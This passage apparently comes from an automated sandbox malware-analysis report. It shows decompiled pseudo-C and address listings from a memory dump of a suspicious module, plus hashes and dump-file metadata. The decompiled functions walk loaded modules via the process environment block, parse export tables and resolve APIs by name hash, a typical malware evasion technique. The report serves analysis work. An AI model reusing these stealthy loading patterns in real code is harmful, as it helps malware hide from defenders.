													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6e849377
0x6e84937b
0x6e849387
0x6e84938b
0x6e84938f
0x6e849394
0x6e849397
0x6e849399
0x6e84939b
0x6e84939b
0x6e84939e
0x6e8493a4
0x6e84941c
0x6e849420
0x6e849423
0x6e849423
0x6e849426
0x00000000
0x6e849426
0x6e8493ab
0x6e849413
0x6e849417
0x00000000
0x6e849417
0x6e8493b2
0x6e84940b
0x6e84940e
0x00000000
0x6e84940e
0x6e8493b7
0x6e8493f5
0x6e8493fc
0x6e8493ff
0x6e8493c8
0x6e8493c8
0x6e8493ce
0x00000000
0x00000000
0x6e8493d3
0x6e8493ed
0x6e8493f0
0x00000000
0x6e8493f0
0x6e8493d8
0x00000000
0x6e8493da
0x6e8493de
0x6e8493e1
0x00000000
0x6e8493e1
0x6e8493d8
0x6e849429
0x6e849429
0x6e849429
0x6e849432
0x6e84943b
0x6e84943e
0x6e849441
0x6e849444
0x6e849447
0x6e84944d
0x6e84948f
0x6e849492
0x6e849493
0x6e84949a
0x6e84949d
0x6e84944f
0x6e849453
0x6e84945d
0x6e849464
0x6e849466
0x6e84947f
0x6e849482
0x6e849482
0x6e849464
0x6e8494a5
0x6e8494a8
0x6e8494ab
0x6e8494af
0x6e8494b3
0x6e8494bd
0x6e8494c1
0x6e8494cb
0x6e8494d4
0x6e8494e1
0x6e8494e4
0x6e8494e7
0x6e8494e7
0x6e8494f3
0x6e8494fe
0x6e849504
0x6e849508
0x6e8494f5
0x6e8494f5
0x6e8494f5
0x6e849510
0x6e84953a
0x6e849540
0x6e849540
0x6e849548
0x6e8498f1
0x6e8498f7
0x6e8498fd
0x6e8498fd
0x00000000
0x6e84954e
0x6e84954e
0x6e849552
0x6e849555
0x6e849558
0x6e84955b
0x6e84955f
0x6e849561
0x6e849564
0x6e849567
0x6e84956b
0x6e849570
0x6e849573
0x6e849577
0x6e84957c
0x6e84957f
0x6e849581
0x6e849584
0x6e849588
0x6e84958d
0x6e84959d
0x6e8495a3
0x6e8495a3
0x6e8495ab
0x6e8495ad
0x6e8495b6
0x6e8495b8
0x6e8495bb
0x6e8495c6
0x6e8495f3
0x6e8495c8
0x6e8495df
0x6e8495df
0x6e8495fb
0x6e849601
0x6e849607
0x6e849607
0x6e8495fb
0x6e8495b6
0x6e84960e
0x6e84967f
0x6e849684
0x6e8496dd
0x6e84979f
0x6e8497a4
0x6e8497b3
0x6e8497b9
0x6e8497bd
0x6e8497c6
0x6e8497cd
0x6e8497d6
0x6e8497e4
0x6e8497e7
0x6e8497cf
0x6e8497cf
0x6e8497cf
0x6e8497cd
0x6e8497f0
0x6e84981d
0x6e849830
0x6e849838
0x6e84981f
0x6e849821
0x6e849829
0x6e849829
0x6e8497f2
0x6e8497f7
0x6e849816
0x6e8497f9
0x6e8497fe
0x6e84980f
0x6e849800
0x6e849800
0x6e849800
0x6e8497fe
0x6e8497f7
0x6e849840
0x6e84984f
0x6e84985c
0x6e849865
0x6e849869
0x6e84986d
0x6e849870
0x6e849873
0x6e849876
0x6e849879
0x6e84987c
0x6e849882
0x6e849886
0x6e84988c
0x6e84988c
0x6e849882
0x6e849892
0x6e8498cf
0x6e8498d3
0x6e8498da
0x6e8498e0
0x6e849894
0x6e849897
0x6e8498b7
0x6e8498bb
0x6e8498c2
0x6e8498c9
0x6e849899
0x6e84989c
0x6e84989e
0x6e8498a2
0x6e8498ac
0x6e8498b2
0x6e8498b2
0x6e84989c
0x6e849897
0x6e8498e7
0x6e8498e7
0x6e849900
0x6e849900
0x6e849906
0x6e84990b
0x6e849965
0x6e84996a
0x6e8499a9
0x6e8499ae
0x6e8499b0
0x6e8499b4
0x6e8499b7
0x6e8499ba
0x6e8499bc
0x6e8499bd
0x6e8499bd
0x6e8499c2
0x6e8499e0
0x6e8499e2
0x6e8499e6
0x6e8499ec
0x6e8499ef
0x6e8499f1
0x6e8499f2
0x6e8499f2
0x00000000
0x6e8499c4
0x6e8499c4
0x6e8499c4
0x6e8499c8
0x6e8499ce
0x6e8499d1
0x6e8499d3
0x6e8499d6
0x6e8499f5
0x6e8499f5
0x6e8499fc
0x6e849a16
0x6e8499fe
0x6e8499fe
0x6e849a0a
0x6e849a0b
0x6e849a0e
0x6e849a0e
0x6e849a24
0x6e849a24
0x6e8499c2
0x6e84996f
0x6e84997d
0x6e849995
0x6e849999
0x6e84999c
0x6e8499a2
0x6e8499a6
0x6e8499a6
0x00000000
0x6e8499a6
0x6e84997f
0x6e849983
0x6e849989
0x6e849989
0x6e84998f
0x00000000
0x6e84998f
0x6e849971
0x6e849975
0x00000000
0x6e849975
0x6e84990f
0x6e84993b
0x6e849953
0x6e849957
0x6e84995a
0x6e84995d
0x6e84995f
0x6e849962
0x6e84993d
0x6e84993d
0x6e849941
0x6e849944
0x6e849947
0x6e84994a
0x6e84994d
0x6e84994d
0x00000000
0x6e84993b
0x6e849915
0x00000000
0x00000000
0x6e84991b
0x6e84991f
0x6e849925
0x6e849928
0x6e84992b
0x6e84992e
0x00000000
0x6e84992e
0x6e8497a6
0x6e8497aa
0x6e8497b0
0x00000000
0x6e8497b0
0x6e8496e8
0x6e8496fa
0x6e8496ff
0x6e84976a
0x00000000
0x00000000
0x6e849771
0x6e849797
0x6e84979b
0x00000000
0x00000000
0x6e84977a
0x6e84977f
0x6e849793
0x00000000
0x00000000
0x00000000
0x6e849795
0x6e849786
0x00000000
0x00000000
0x6e84978b
0x00000000
0x00000000
0x6e84978d
0x00000000
0x6e849771
0x6e849701
0x6e84970b
0x6e84971c
0x6e84971f
0x6e849722
0x6e849728
0x00000000
0x00000000
0x00000000
0x00000000
0x6e84972e
0x6e84972e
0x6e84972e
0x6e849735
0x00000000
0x00000000
0x6e849737
0x6e84973a
0x6e849740
0x00000000
0x00000000
0x00000000
0x6e849742
0x6e849744
0x6e84974d
0x00000000
0x00000000
0x6e849761
0x00000000
0x00000000
0x00000000
0x6e849763
0x6e8496ef
0x00000000
0x00000000
0x00000000
0x6e8496f5
0x6e849689
0x6e8496b8
0x6e8496b9
0x6e8496c2
0x00000000
0x6e8496d3
0x00000000
0x6e8496d3
0x6e849690
0x6e849693
0x6e8496a6
0x6e8496a7
0x6e8496ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e849693
0x6e849689
0x6e849615
0x6e849672
0x6e849676
0x6e84967c
0x00000000
0x6e84967c
0x6e849617
0x6e84961b
0x6e849628
0x6e84962c
0x6e849642
0x6e84964a
0x6e84962e
0x6e849630
0x6e84963a
0x6e84963a
0x6e849650
0x6e849659
0x6e849670
0x00000000
0x00000000
0x00000000
0x6e849670
0x6e84965b
0x6e84965b
0x00000000
0x6e849650

Strings

, xrefs: 6E8499DB

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 663659581db2bc720eeaf1ace900b2a6e2f08b54d95554ba49dba9abcf6c3283
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: 67228F3140839FCBD764CE99C6A136ABBE0FF86314F008C6EE8E557295D3359A45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E84143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E84143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E840304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e84d208 == 0 ||  *0x6e84d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E844FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e84d2f0 |  *0x6e84d2f1;
									if(( *0x6e84d2f0 |  *0x6e84d2f1) == 0) {
										_t525 =  *0x6e84d208; // 0x2c71340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e84d2f0 = 1;
											_t526 = E6E84361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E841C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e84d208 = _t526;
											 *0x6e84d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E84361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E841C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E83DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E83DFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6e84d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6e84d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E83E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6E84306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e84d2e4 = 1;
					E6E83F584( &(_t535[0x38]), 0);
					E6E83F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E83F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E84306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E83F828( &(_t535[0xc]), E6E83F4CC( &(_t535[8])) + 0x14);
								_t369 = E6E83F4BC( &(_t535[0xc]), E6E83F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E83F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E83F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E83F654( &(_t535[8]));
							E6E83F654( &(_t535[0x164]));
							E6E83F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E83F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6E841D34(0x60a28c5c);
							_t290 = E6E8412EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E841C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6E83D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E845CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E845D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E848E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E83F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E83BB44( &(_t535[0x110]));
							}
							E6E83CFDC( &(_t535[0x104]));
							E6E83CFDC(_t518);
							E6E83CFDC( &(_t535[0x15c]));
							E6E83CFDC( &(_t535[0x154]));
							E6E8490EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E83F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E8490B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E83F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E83F4CC( &(_t535[0x44]));
								_t519 =  *(0x6e84bd40 + _t381 * 4);
								_t531 = E6E84907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E8487E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E83F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E83F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E83F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E83F828( &(_t535[0x20]), E6E83F4CC( &(_t535[0x1c])) + 8);
										E6E83F4BC( &(_t535[0x20]), E6E83F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E84317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E83F828( &(_t535[0x48]), _t535[0x70]);
									E6E84317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E83F840( &(_t535[0x44]), _t563);
									E6E83F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E84913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E849104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E83F654( &(_t535[0x144]));
									E6E83F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e84d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E83F654( &(_t535[0x11c]));
							E6E848E68(_t381,  &(_t535[0xd8]));
							E6E83F654( &(_t535[0x1c]));
							E6E83F654( &(_t535[0x44]));
							E6E83F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E83F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E83F828( &(_t535[0x38]), E6E83F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6E83F4BC( &(_t535[0x38]), E6E83F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E83F4BC( &(_t535[0xc]), _t62);
						_t455 = E6E83F4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6e841448
0x6e84144f
0x6e841452
0x6e841459
0x6e841bdb
0x6e841bdb
0x6e84145f
0x6e84146a
0x6e8419a9
0x6e8419ad
0x00000000
0x6e841c2c
0x6e8419b3
0x6e8419b6
0x6e8419b9
0x6e8419c3
0x6e8419d2
0x6e8419d4
0x6e8419db
0x6e841bc5
0x6e841bc7
0x6e841bca
0x6e841bce
0x00000000
0x6e841bce
0x6e8419ea
0x6e8419f5
0x6e8419fc
0x6e8419ff
0x6e841a01
0x6e841a04
0x6e841a07
0x6e841a0d
0x6e841a1b
0x6e841a2b
0x6e841a50
0x6e841a61
0x6e841a64
0x6e841a66
0x6e841aca
0x6e841acd
0x6e841acd
0x6e841acf
0x6e841ad2
0x6e841ad6
0x6e841ad6
0x6e841ada
0x00000000
0x00000000
0x6e841ae7
0x6e841aed
0x6e841b21
0x6e841b27
0x6e841b29
0x6e841bf8
0x6e841c00
0x6e841c03
0x6e841c05
0x6e841c1c
0x6e841c1c
0x6e841c07
0x6e841c0b
0x6e841c10
0x6e841c10
0x6e841c1e
0x6e841c24
0x6e841b43
0x6e841b43
0x6e841b45
0x6e841b45
0x6e841b47
0x6e841b47
0x6e841b4c
0x00000000
0x00000000
0x6e841b4e
0x6e841b4f
0x6e841b52
0x6e841b55
0x00000000
0x00000000
0x6e841b61
0x6e841b64
0x6e841b66
0x6e841b7d
0x6e841b7d
0x6e841b68
0x6e841b6c
0x6e841b71
0x6e841b71
0x6e841b8a
0x6e841b8d
0x6e841b96
0x6e841b99
0x6e841bbc
0x6e841bc0
0x00000000
0x6e841bc0
0x6e841ba1
0x6e841ba1
0x6e841bad
0x6e841bb0
0x6e841bb9
0x00000000
0x6e841bb9
0x6e841b2f
0x6e841b3f
0x6e841b3f
0x6e841b41
0x00000000
0x00000000
0x6e841b37
0x6e841b39
0x6e841b39
0x00000000
0x6e841b3f
0x6e841aef
0x6e841af7
0x6e841b17
0x6e841af9
0x6e841af9
0x6e841b01
0x6e841b0a
0x6e841b0a
0x6e841b01
0x00000000
0x6e841af7
0x6e841a68
0x6e841a6f
0x00000000
0x00000000
0x6e841a7c
0x6e841a82
0x6e841a87
0x6e841a8e
0x6e841a92
0x6e841aa7
0x6e841aa9
0x6e841aab
0x6e841ab1
0x6e841abf
0x6e841abf
0x6e841ac5
0x00000000
0x6e841ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e841a0f
0x6e841a0f
0x6e841a0f
0x6e841a10
0x6e841a13
0x6e841a17
0x00000000
0x6e841a2d
0x6e841a30
0x6e841a33
0x6e841a3c
0x6e841a3f
0x6e841a40
0x6e841a42
0x00000000
0x6e84147d
0x6e84147f
0x6e841484
0x6e84148f
0x6e84149d
0x6e8414b0
0x6e8414bd
0x6e8414c6
0x6e8414ca
0x6e8414ce
0x6e841516
0x6e841516
0x6e841518
0x6e84151f
0x00000000
0x00000000
0x6e841538
0x6e841540
0x6e841544
0x6e841559
